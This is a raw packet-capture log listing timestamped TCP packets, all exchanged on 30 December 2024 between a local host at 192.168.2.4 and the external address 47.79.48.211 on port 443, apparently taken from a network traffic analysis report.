                                                                                                                                                                    Dec 30, 2024 04:59:05.807450056 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.807472944 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.807490110 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.807759047 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.807777882 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.807811022 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.807817936 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.807832956 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.807851076 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.808239937 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.808255911 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.808362007 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.808370113 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.808423042 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.809729099 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.809745073 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.809789896 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.809799910 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.809832096 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.814781904 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.814795971 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.814856052 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.814863920 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.814894915 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.814904928 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.821646929 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.821661949 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.821696043 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.821702957 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.821741104 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.822259903 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.822274923 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.822310925 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.822319031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.822364092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.825886965 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.825903893 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.825957060 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.825963974 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.826000929 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.890851021 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.890863895 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.890929937 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.890944958 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891009092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.891239882 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891252995 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891288996 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.891298056 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891321898 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.891336918 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.891709089 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891722918 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891766071 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.891773939 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.891812086 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.893265963 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.893280983 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.893348932 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.893356085 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.893455982 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.898433924 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.898448944 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.898513079 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.898525000 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.898768902 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.905128002 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905143023 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905208111 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.905216932 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905251980 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.905831099 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905844927 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905891895 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.905901909 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905931950 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.905946016 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.909375906 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.909389973 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.909463882 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.909473896 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.912769079 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.974479914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.974500895 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.974596024 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.974610090 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.974643946 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.974654913 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975115061 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975130081 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975179911 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975191116 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975280046 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975297928 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975338936 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975347042 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975359917 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975387096 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.976867914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.976886034 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.976929903 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.976936102 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.976963043 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.976974010 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.981888056 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.981903076 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.981985092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.981993914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.982419968 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.988677025 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.988693953 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.988785982 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.988795042 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989398003 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989414930 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989464045 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.989470959 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989491940 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.989522934 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.083000898 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.083014965 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.083106995 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.083117008 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.083780050 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.084404945 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084419966 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084484100 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.084491968 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084909916 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084927082 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084963083 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.084969044 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084985018 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085010052 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085764885 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.085777998 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.085818052 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085825920 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.085834980 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085853100 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.089885950 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.089900970 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.089962006 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.089971066 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.092777014 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.096900940 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.096918106 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.096987009 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.096993923 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.098789930 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.103782892 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.103796959 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.103863955 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.103871107 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104624987 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104645014 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104677916 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.104686022 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104703903 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.104733944 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.105662107 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174391031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174417019 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174472094 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174483061 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174508095 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174515963 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174568892 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174591064 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174624920 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174631119 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174650908 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174664021 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.175247908 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.175270081 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.175302982 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.175309896 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.175348043 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.175371885 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.176206112 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.176222086 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.176264048 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.176279068 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.176753044 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.177148104 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.177165031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.177194118 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.177210093 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.177218914 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.177243948 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192455053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192471981 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192542076 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192542076 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192555904 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192574024 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192596912 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192604065 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192625999 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192629099 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192636013 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192643881 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192665100 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192668915 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192698002 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192703962 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192713976 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192733049 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.257730961 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.257755041 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.257812977 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.257822037 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.257857084 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.258280993 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.258296013 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.258331060 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.258338928 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.258348942 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.258371115 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.258629084 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.258644104 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.258670092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.258677959 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.258699894 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.258713961 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.259742022 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.259757996 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.259794950 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.259802103 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.259824038 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.259843111 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.260755062 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.260768890 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.260812998 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.260819912 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.261168957 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271290064 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271305084 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271359921 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271370888 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271522999 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271522999 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271548033 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271563053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271599054 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271605015 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271625042 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271641970 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271925926 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271943092 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.271981955 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.271987915 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.272006035 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.272021055 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.341552019 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.341567993 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.341625929 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.341653109 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.341658115 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.341671944 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.341706991 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.341737032 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.342164993 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.342180014 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.342232943 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.342238903 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.342261076 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.342273951 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.343153954 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.343168974 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.343224049 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.343230963 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.344335079 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.344353914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.344403028 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.344408989 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.344425917 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.344455957 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.354906082 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.354919910 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.354984045 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.354995012 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.355123997 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.355140924 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.355175972 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.355184078 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.355206966 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.355228901 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.355458975 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.355473042 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.355514050 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.355520964 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.356755018 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.429202080 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.429217100 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.429265976 CET4434973247.79.48.211192.168.2.4
